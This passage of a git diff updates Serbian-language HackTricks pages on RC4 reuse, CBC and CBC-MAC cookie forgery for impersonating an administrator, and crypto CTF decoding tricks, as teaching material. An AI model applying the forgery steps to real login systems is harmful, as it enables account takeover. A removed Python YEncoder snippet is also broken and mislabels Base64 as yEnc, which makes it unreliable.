zamenite prvi blok sa poslednjim i predstavljate korisnika `admin`: `admin |username`** diff --git a/crypto-and-stego/rc4-encrypt-and-decrypt.md b/crypto-and-stego/rc4-encrypt-and-decrypt.md index 530aa7255..7d69cd3db 100644 --- a/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/crypto-and-stego/rc4-encrypt-and-decrypt.md @@ -1,22 +1,42 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJEM**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks suvenir**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite trikove hakovanja slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -Ako na neki način možete da šifrujete plaintext koristeći RC4, možete dešifrovati bilo koji sadržaj šifrovan tim RC4 (koristeći istu lozinku) samo koristeći funkciju šifrovanja. +Ako na neki način možete šifrovati tekst pomoću RC4, možete dešifrovati bilo koji sadržaj šifrovan tim RC4 (koristeći istu lozinku) samo koristeći funkciju šifrovanja. -Ako možete da šifrujete poznati plaintext, takođe možete izvući lozinku. Više referenci možete pronaći na HTB Kryptos mašini: +Ako možete šifrovati poznati tekst, takođe možete izvući lozinku. Više referenci možete pronaći na HTB Kryptos mašini: {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} + + + + + +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Podržite HackTricks + +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite trikove hakovanja slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. + +
+{% endhint %} diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/cryptography/cipher-block-chaining-cbc-mac-priv.md index c5ef09a65..a9f5a5bfa 100644 --- a/cryptography/cipher-block-chaining-cbc-mac-priv.md +++ b/cryptography/cipher-block-chaining-cbc-mac-priv.md @@ -1,64 +1,65 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite trikove hakovanja slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} # CBC -Ako je **kolačić** samo **korisničko ime** (ili prvi deo kolačića je korisničko ime) i želite da se predstavite kao korisničko ime "**admin**". Tada možete kreirati korisničko ime **"bdmin"** i **bruteforce**-ovati **prvi bajt** kolačića. +Ako je **kolačić** **samo** **korisničko ime** (ili je prvi deo kolačića korisničko ime) i želite da se predstavite kao korisnik "**admin**". Tada možete kreirati korisničko ime **"bdmin"** i **bruteforce** prvi bajt kolačića. # CBC-MAC -**Cipher block chaining message authentication code** (**CBC-MAC**) je metoda koja se koristi u kriptografiji. Radi tako što uzima poruku i enkriptuje je blok po blok, pri čemu je enkripcija svakog bloka povezana sa prethodnim. Ovaj proces stvara **lanac blokova**, osiguravajući da čak i promena jednog jedinog bita originalne poruke dovede do nepredvidive promene poslednjeg bloka enkriptovanih podataka. Da bi se izvršila ili poništila takva promena, potreban je ključ za enkripciju, što osigurava bezbednost. +**Šifrovani blok-lančani kod poruke za autentifikaciju** (**CBC-MAC**) je metoda korišćena u kriptografiji. Radi tako što uzima poruku i šifruje je blok po blok, gde je šifrovanje svakog bloka povezano sa prethodnim. Ovaj proces stvara **lanac blokova**, osiguravajući da čak i promena jednog bita originalne poruke dovede do nepredvidive promene poslednjeg bloka šifrovanih podataka. Da bi se napravila ili poništila takva promena, potreban je ključ za šifrovanje, osiguravajući sigurnost. -Da bi se izračunao CBC-MAC poruke m, poruka m se enkriptuje u CBC režimu sa nulom kao inicijalizacionim vektorom i čuva se poslednji blok. Sledeća slika prikazuje izračunavanje CBC-MAC poruke koja se sastoji od blokova![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) koristeći tajni ključ k i blok šifre E: +Za izračunavanje CBC-MAC poruke m, šifruje se m u CBC režimu sa nulom kao inicijalizacijom vektora i čuva se poslednji blok. Sledeća slika prikazuje računanje CBC-MAC poruke koja se sastoji od blokova ![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) koristeći tajni ključ k i blok šifre E: ![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) # Ranjivost -Sa CBC-MAC-om, obično se koristi **IV vrednost 0**.\ -Ovo je problem jer dve poznate poruke (`m1` i `m2`) nezavisno generišu dva potpisa (`s1` i `s2`). Dakle: +Sa CBC-MAC obično se koristi **IV 0**.\ +To je problem jer će 2 poznate poruke (`m1` i `m2`) nezavisno generisati 2 potpisa (`s1` i `s2`). Dakle: * `E(m1 XOR 0) = s1` * `E(m2 XOR 0) = s2` -Zatim, poruka koja se sastoji od konkatenacije m1 i m2 (m3) generiše dva potpisa (s31 i s32): +Zatim će poruka sastavljena od m1 i m2 konkateniranih (m3) generisati 2 potpisa (s31 i s32): * `E(m1 XOR 0) = s31 = s1` * `E(m2 XOR s1) = s32` -**Što je moguće izračunati bez poznavanja ključa enkripcije.** +**Što je moguće izračunati bez poznavanja ključa za šifrovanje.** Zamislite da šifrujete ime **Administrator** u blokovima od **8 bajtova**: * `Administ` * `rator\00\00\00` -Možete kreirati korisničko ime koje se zove **Administ** (m1) i dobiti potpis (s1).\ -Zatim, možete kreirati korisničko ime koje se zove rezultat `rator\00\00\00 XOR s1`. Ovo će generisati `E(m2 XOR s1 XOR 0)` koji je s32.\ -Sada možete koristiti s32 kao potpis za puno ime **Administrator**. +Možete kreirati korisničko ime nazvano **Administ** (m1) i dobiti potpis (s1).\ +Zatim možete kreirati korisničko ime nazvano rezultat `rator\00\00\00 XOR s1`. Ovo će generisati `E(m2 XOR s1 XOR 0)` što je s32.\ +sada možete koristiti s32 kao potpis punog imena **Administrator**. ### Rezime 1. Dobijte potpis korisničkog imena **Administ** (m1) koji je s1 -2. Dobijte potpis korisničkog imena **rator\x00\x00\x00 XOR s1 XOR 0** koji je s32**.** -3. Postavite kolačić na s32 i to će biti validan kolačić za korisnika **Administrator**. +2. Dobijte potpis korisničkog imena **rator\x00\x00\x00 XOR s1 XOR 0** je s32**.** +3. Postavite kolačić na s32 i biće validan kolačić za korisnika **Administrator**. # Kontrolisanje napada IV -Ako možete kontrolisati korišćeni IV, napad može biti veoma jednostavan.\ -Ako su kolačići samo šifrovano korisničko ime, da biste se predstavili kao korisnik "**administrator**" možete kreirati korisnika "**Administrator**" i dobiti njegov kolačić.\ +Ako možete kontrolisati korišćeni IV, napad bi mogao biti veoma jednostavan.\ +Ako su kolačići samo šifrovano korisničko ime, da se predstavite kao korisnik "**administrator**" možete kreirati korisnika "**Administrator**" i dobićete njegov kolačić.\ Sada, ako možete kontrolisati IV, možete promeniti prvi bajt IV-a tako da **IV\[0] XOR "A" == IV'\[0] XOR "a"** i ponovo generisati kolačić za korisnika **Administrator**. Ovaj kolačić će biti validan za **predstavljanje** korisnika **administrator** sa početnim **IV**. ## Reference @@ -66,16 +67,17 @@ Sada, ako možete kontrolisati IV, možete promeniti prvi bajt IV-a tako da **IV Više informacija na [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite trikove hakovanja slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/cryptography/crypto-ctfs-tricks.md b/cryptography/crypto-ctfs-tricks.md index dc5149f56..f4889e203 100644 --- a/cryptography/crypto-ctfs-tricks.md +++ b/cryptography/crypto-ctfs-tricks.md @@ -1,18 +1,19 @@ -# Trikovi za Crypto CTF-ove +# Trikovi za kriptografske CTF-ove + +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Ekspert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Ekspert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini da podržite HackTricks: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu**, proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite trikove hakovanja slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} ## Online baze heševa @@ -28,24 +29,24 @@ Drugi načini da podržite HackTricks: * [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5) * [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) -## Čarobni automatski rešavači +## Magični automatski rešavači * [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey) -* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic modul) +* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magični modul) * [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) * [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking) -## Enkoderi +## Kodovi za enkodovanje -Većina enkodiranih podataka može se dekodirati pomoću ovih 2 resursa: +Većina enkodovanih podataka može se dekodovati pomoću ovih 2 resursa: * [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) * [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) -### Automatski rešavači za zamenu +### Substitucioni automatski rešavači * [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram) -* [https://quipqiup.com/](https://quipqiup.com) - Veoma dobro! +* [https://quipqiup.com/](https://quipqiup.com) - Veoma dobro ! #### Cezar - ROTx automatski rešavači @@ -55,51 +56,10 @@ Većina enkodiranih podataka može se dekodirati pomoću ovih 2 resursa: * [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php) -### Automatski rešavači za osnovne enkodiranje +### Automatski rešavači za osnovne enkodovanja Proverite sve ove baze sa: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) - -* **Ascii85** -* `BQ%]q@psCd@rH0l` -* **Base26** \[_A-Z_] -* `BQEKGAHRJKHQMVZGKUXNT` -* **Base32** \[_A-Z2-7=_] -* `NBXWYYLDMFZGCY3PNRQQ====` -* **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_] -* `pbzsaamdcf3gna5xptoo====` -* **Base32 Geohash** \[_0-9b-hjkmnp-z_] -* `e1rqssc3d5t62svgejhh====` -* **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_] -* `D1QPRRB3C5S62RVFDHGG====` -* **Base32 Extended Hexadecimal** \[_0-9A-V_] -* `D1NMOOB3C5P62ORFDHGG====` -* **Base45** \[_0-9A-Z $%\*+-./:_] -* `59DPVDGPCVKEUPCPVD` -* **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_] -* `2yJiRg5BF9gmsU6AC` -* **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_] -* `2YiHqF5bf9FLSt6ac` -* **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_] -* `pyJ5RgnBE9gm17awU` -* **Base62** \[_0-9A-Za-z_] -* `g2AextRZpBKRBzQ9` -* **Base64** \[_A-Za-z0-9+/=_] -* `aG9sYWNhcmFjb2xh` -* **Base67** \[_A-Za-z0-9-_.!\~\_] -* `NI9JKX0cSUdqhr!p` -* **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -* `BQ%]q@psCd@rH0l` -* **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -* `<~BQ%]q@psCd@rH0l~>` -* **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_] -* `Xm4y`V\_|Y(V{dF>\` -* **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` -* **Base85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__] -* `Xm4y|V{~Y+V}dF?` -* **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_] -* `frDg[*jNN!7&BQM` -* +* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] * `DmPsv8J7qrlKEoY7` * **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] * `kLD8iwKsigSalLJ5` @@ -126,19 +86,15 @@ Proverite sve ove baze sa: [https://github.com/dhondta/python-codext](https://gi ``` ╫☐↑Λ↻Λ┏Λ↻☐↑Λ ``` -* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) +* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Mrtav: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) ### Morse - -### Морзе ``` .... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- ``` -* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) +* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Mrtav: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) ### UUencoder - -UUencoder je tehnika enkodiranja koja se koristi za pretvaranje binarnih podataka u ASCII format. Ova tehnika je često korišćena u kriptografiji i komunikaciji putem mejla. UUencoder konvertuje binarne podatke u ASCII karaktere kako bi se omogućilo slanje podataka putem tekstualnih formata koji podržavaju samo ASCII karaktere. Ova tehnika je korisna u situacijama kada je potrebno preneti binarne podatke preko kanala koji podržava samo tekstualne formate. ``` begin 644 webutils_pl M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%( @@ -149,9 +105,7 @@ end ``` * [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu) -### XXEncoder - -XXEncoder je jednostavan alat koji se koristi za enkodiranje i dekodiranje podataka u različitim formatima. Može se koristiti za enkodiranje tekstualnih podataka u format koji je pogodan za prenos preko HTTP zahteva. Takođe može biti koristan za enkodiranje binarnih podataka kao što su slike ili fajlovi. Ovaj alat je često korišćen u CTF takmičenjima za rešavanje kriptografskih izazova. +### XXEnkoder ``` begin 644 webutils_pl hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236 @@ -161,35 +115,6 @@ end * [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx) ### YEncoder - -YEncoder je jednostavan algoritam enkodiranja koji se koristi za enkodiranje binarnih podataka u ASCII format. Ovaj algoritam je često korišćen u CTF takmičenjima za skrivanje informacija. - -Da biste dekodovali YEncoded podatke, možete koristiti različite online alate ili napisati sopstveni skript. Kada dekodujete podatke, dobićete originalne binarne podatke. - -Evo primera kako možete dekodovati YEncoded podatke koristeći Python skript: - -```python -import binascii - -def ydecode(data): - decoded_data = '' - i = 0 - while i < len(data): - if data[i] == '=': - break - char = ord(data[i]) - 42 - decoded_data += chr(char) - i += 1 - return binascii.unhexlify(decoded_data) - -encoded_data = 'Y29vbCBkYXRh' -decoded_data = ydecode(encoded_data) -print(decoded_data) -``` - -Ovaj skript će dekodovati YEncoded podatke `'Y29vbCBkYXRh'` i ispisati originalne binarne podatke `'cool data'`. - -Kada se susretnete sa YEncoded podacima tokom CTF takmičenja, važno je da pažljivo proučite kako su podaci enkodirani i koristite odgovarajuće metode za dekodiranje. ``` =ybegin line=128 size=28 name=webutils_pl ryvkryvkryvkryvkryvkryvkryvk @@ -198,8 +123,6 @@ ryvkryvkryvkryvkryvkryvkryvk * [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc) ### BinHex - -BinHex je metoda enkodiranja koja se koristi za pretvaranje binarnih podataka u tekstualni format. Ova tehnika je često korišćena u prošlosti za prenos binarnih fajlova putem emaila ili drugih tekstualnih kanala komunikacije. BinHex enkodiranje koristi 6-bitnu ASCII enkodiranu verziju originalnih binarnih podataka. Ova metoda takođe dodaje kontrolne karaktere kako bi se obezbedila integritet podataka prilikom prenosa. BinHex enkodiranje se može dekodirati kako bi se dobili originalni binarni podaci. ``` (This file must be converted with BinHex 4.0) :#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p @@ -208,8 +131,6 @@ BinHex je metoda enkodiranja koja se koristi za pretvaranje binarnih podataka u * [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) ### ASCII85 - -ASCII85 je metoda enkodiranja koja se koristi za pretvaranje binarnih podataka u tekstualni format. Ova tehnika je često korišćena u CTF izazovima i može biti korisna prilikom rešavanja kriptografskih zagonetki. ASCII85 enkodiranje se zasniva na pretvaranju svakih 4 bajta binarnih podataka u 5 ASCII karaktera. Ova tehnika je slična Base64 enkodiranju, ali ASCII85 omogućava efikasnije enkodiranje podataka. Da biste dekodovali ASCII85 enkodirane podatke, možete koristiti različite alate i biblioteke dostupne na internetu. ``` <~85DoF85DoF85DoF85DoF85DoF85DoF~> ``` @@ -219,25 +140,25 @@ ASCII85 je metoda enkodiranja koja se koristi za pretvaranje binarnih podataka u ``` drnajapajrna ``` -* [https://www.geocachingtoolbox.com/index.php?lang=sr\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=sr\&page=dvorakKeyboard) +* [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard) ### A1Z26 -Slova u njihovu numeričku vrednost +Slova njihova numerička vrednost ``` 8 15 12 1 3 1 18 1 3 15 12 1 ``` -### Enkodiranje pomoću Afine šifre +### Afinski šifarski kod -Slovo u broj `(ax+b)%26` (_a_ i _b_ su ključevi, a _x_ je slovo) i rezultat se vraća nazad u slovo +Pretvori slovo u broj `(ax+b)%26` (_a_ i _b_ su ključevi, a _x_ je slovo) i rezultat ponovo u slovo ``` krodfdudfrod ``` ### SMS Kod -**Multitap** [zamenjuje slovo](https://www.dcode.fr/word-letter-change) ponavljajućim brojevima definisanim odgovarajućim kodom na tastaturi mobilnog [telefona](https://www.dcode.fr/phone-keypad-cipher) (Ovaj režim se koristi prilikom pisanja SMS poruka).\ +**Multitap** [zamenjuje slovo](https://www.dcode.fr/word-letter-change) ponovljenim brojevima definisanim odgovarajućim kodom tastera na mobilnoj [telefonskoj tastaturi](https://www.dcode.fr/phone-keypad-cipher) (Ovaj režim se koristi prilikom pisanja SMS poruka).\ Na primer: 2=A, 22=B, 222=C, 3=D...\ -Možete prepoznati ovaj kod jer ćete videti\*\* više puta ponovljene brojeve\*\*. +Možete identifikovati ovaj kod jer ćete videti\*\* više puta ponovljene brojeve\*\*. Ovaj kod možete dekodirati na: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) @@ -254,11 +175,11 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ## Kompresija -**Raw Deflate** i **Raw Inflate** (obe možete pronaći u Cyberchef-u) mogu kompresovati i dekompresovati podatke bez zaglavlja. +**Sirovi Deflate** i **Sirovi Inflate** (možete pronaći oba u Cyberchef-u) mogu kompresovati i dekompresovati podatke bez zaglavlja. ## Jednostavna Kriptografija -### XOR - Automatsko rešavanje +### XOR - Automatsko rešenje * [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/) @@ -270,7 +191,7 @@ fgaargaamnlunesuneoa ``` ### Vigenere -Potreban je ključna reč +Potreban je ključ ``` wodsyoidrods ``` @@ -278,7 +199,7 @@ wodsyoidrods * [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher) * [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx) -## Jaka kriptografija +## Jaka Kriptografija ### Fernet @@ -292,9 +213,9 @@ Key: ``` * [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) -### Samirovo deljenje tajni +### Samir Deljenje tajni -Tajna se deli na X delova, a za njeno povraćanje potrebno je Y delova (_Y <=X_). +Tajna je podeljena na X delova i da biste je vratili, potrebno vam je Y delova (_Y <=X_). ``` 8019f8fa5879aa3e07858d08308dc1a8b45 80223035713295bddf0b0bd1b10a5340b89 @@ -313,16 +234,17 @@ Tajna se deli na X delova, a za njeno povraćanje potrebno je Y delova (_Y <=X_) * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) * [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
